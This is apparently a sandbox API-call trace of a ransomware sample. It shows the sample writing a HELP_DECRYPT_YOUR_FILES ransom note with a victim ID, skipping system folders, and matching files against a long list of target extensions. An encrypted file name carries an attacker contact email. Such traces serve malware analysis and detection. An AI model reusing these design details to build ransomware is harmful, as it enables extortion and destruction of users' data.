	[0194.368] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0194.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0194.368] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0194.393] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0194.393] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0194.394] SetFilePointer (in: hFile=0x2c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0194.394] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0194.394] WriteFile (in: hFile=0x2c0, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0194.394] CloseHandle (hObject=0x2c0) returned 1
	[0194.395] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4886550, ftCreationTime.dwHighDateTime=0x1d9677c, ftLastAccessTime.dwLowDateTime=0x8d5eaba4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d610d29, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0194.395] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\*.*") returned 67
	[0194.395] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0194.395] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\*.*", cchLength=0x43 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*") returned 0x43
	[0194.395] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.396] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="windows") returned 0x0
	[0194.396] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.396] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="boot") returned 0x0
	[0194.396] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.396] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="system volume information") returned 0x0
	[0194.396] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.397] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0194.397] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.397] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="temp") returned 0x0
	[0194.397] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.397] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="program files") returned 0x0
	[0194.397] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.397] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="program files (x86)") returned 0x0
	[0194.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.398] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="appdata") returned 0x0
	[0194.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.398] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="application data") returned 0x0
	[0194.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.398] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="winnt") returned 0x0
	[0194.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.398] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="tmp") returned 0x0
	[0194.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.399] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="cache") returned 0x0
	[0194.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.399] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="temporary internet files") returned 0x0
	[0194.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.399] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="webcache") returned 0x0
	[0194.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.400] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="inetcache") returned 0x0
	[0194.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.400] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="nvidia") returned 0x0
	[0194.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.400] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="packages") returned 0x0
	[0194.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.400] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="cookies") returned 0x0
	[0194.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.401] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\*.*", lpSrch="programdata") returned 0x0
	[0194.401] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0194.401] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0194.401] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4886550, ftCreationTime.dwHighDateTime=0x1d9677c, ftLastAccessTime.dwLowDateTime=0x8d5eaba4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8d610d29, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0194.401] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0194.401] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c81f82b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8c81f82b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8c9e94d6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x17f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="4p5dpvfnh8i1im.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="4P5DPV~1.SCL")) returned 1
	[0194.401] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192bb530, ftCreationTime.dwHighDateTime=0x1d9681f, ftLastAccessTime.dwLowDateTime=0xc2b528b0, ftLastAccessTime.dwHighDateTime=0x1d97694, ftLastWriteTime.dwLowDateTime=0xc2b528b0, ftLastWriteTime.dwHighDateTime=0x1d97694, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="C1Fpy4-8p1N", cAlternateFileName="C1FPY4~1")) returned 1
	[0194.402] lstrcmpW (lpString1="C1Fpy4-8p1N", lpString2="..") returned 1
	[0194.402] lstrcmpW (lpString1="C1Fpy4-8p1N", lpString2=".") returned 1
	[0194.403] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl"
	[0194.403] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\"
	[0194.403] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\", lpString2="C1Fpy4-8p1N" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N"
	[0194.403] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N"
	[0194.403] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\"
	[0194.403] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\"
	[0194.403] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\*.*"
	[0194.403] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192bb530, ftCreationTime.dwHighDateTime=0x1d9681f, ftLastAccessTime.dwLowDateTime=0xc2b528b0, ftLastAccessTime.dwHighDateTime=0x1d97694, ftLastWriteTime.dwLowDateTime=0xc2b528b0, ftLastWriteTime.dwHighDateTime=0x1d97694, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0194.404] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\*.*") returned 79
	[0194.404] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0194.404] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\*.*", cchLength=0x4f | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*") returned 0x4f
	[0194.404] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.404] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="windows") returned 0x0
	[0194.404] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.404] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="boot") returned 0x0
	[0194.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.405] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="system volume information") returned 0x0
	[0194.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.405] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0194.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.405] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="temp") returned 0x0
	[0194.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.406] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="program files") returned 0x0
	[0194.406] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.406] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="program files (x86)") returned 0x0
	[0194.406] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.406] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="appdata") returned 0x0
	[0194.406] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.407] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="application data") returned 0x0
	[0194.407] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.407] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="winnt") returned 0x0
	[0194.407] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.407] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="tmp") returned 0x0
	[0194.407] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.407] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="cache") returned 0x0
	[0194.407] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.408] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="temporary internet files") returned 0x0
	[0194.408] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.408] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="webcache") returned 0x0
	[0194.408] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.408] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="inetcache") returned 0x0
	[0194.408] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.408] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="nvidia") returned 0x0
	[0194.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.409] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="packages") returned 0x0
	[0194.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.409] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="cookies") returned 0x0
	[0194.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.409] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\*.*", lpSrch="programdata") returned 0x0
	[0194.409] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x192bb530, ftCreationTime.dwHighDateTime=0x1d9681f, ftLastAccessTime.dwLowDateTime=0xc2b528b0, ftLastAccessTime.dwHighDateTime=0x1d97694, ftLastWriteTime.dwLowDateTime=0xc2b528b0, ftLastWriteTime.dwHighDateTime=0x1d97694, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0194.409] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa683f30, ftCreationTime.dwHighDateTime=0x1d97389, ftLastAccessTime.dwLowDateTime=0x750e7880, ftLastAccessTime.dwHighDateTime=0x1d97501, ftLastWriteTime.dwLowDateTime=0x750e7880, ftLastWriteTime.dwHighDateTime=0x1d97501, nFileSizeHigh=0x0, nFileSizeLow=0x1324a, dwReserved0=0x0, dwReserved1=0x0, cFileName="HFo3G0IUL3KxjhRXD0-O.mp3", cAlternateFileName="HFO3G0~1.MP3")) returned 1
	[0194.410] lstrcmpW (lpString1="HFo3G0IUL3KxjhRXD0-O.mp3", lpString2="..") returned 1
	[0194.410] lstrcmpW (lpString1="HFo3G0IUL3KxjhRXD0-O.mp3", lpString2=".") returned 1
	[0194.410] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\"
	[0194.410] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\", lpString2="HFo3G0IUL3KxjhRXD0-O.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\HFo3G0IUL3KxjhRXD0-O.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\HFo3G0IUL3KxjhRXD0-O.mp3"
	[0194.410] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\HFo3G0IUL3KxjhRXD0-O.mp3") returned 100
	[0194.410] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0194.410] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\4 WeFFAYw8qt-MRv\\IZigkEMouwXCNeznLl\\C1Fpy4-8p1N\\HFo3G0IUL3KxjhRXD0-O.mp3", cchLength=0x64 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3") returned 0x64
	[0194.410] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.411] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0194.411] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3"
	[0194.411] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\4 weffayw8qt-mrv\\izigkemouwxcneznll\\c1fpy4-8p1n\\hfo3g0iul3kxjhrxd0-o.mp3") returned 100
	[0194.411] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0194.411] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.412] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0194.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0194.412] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.p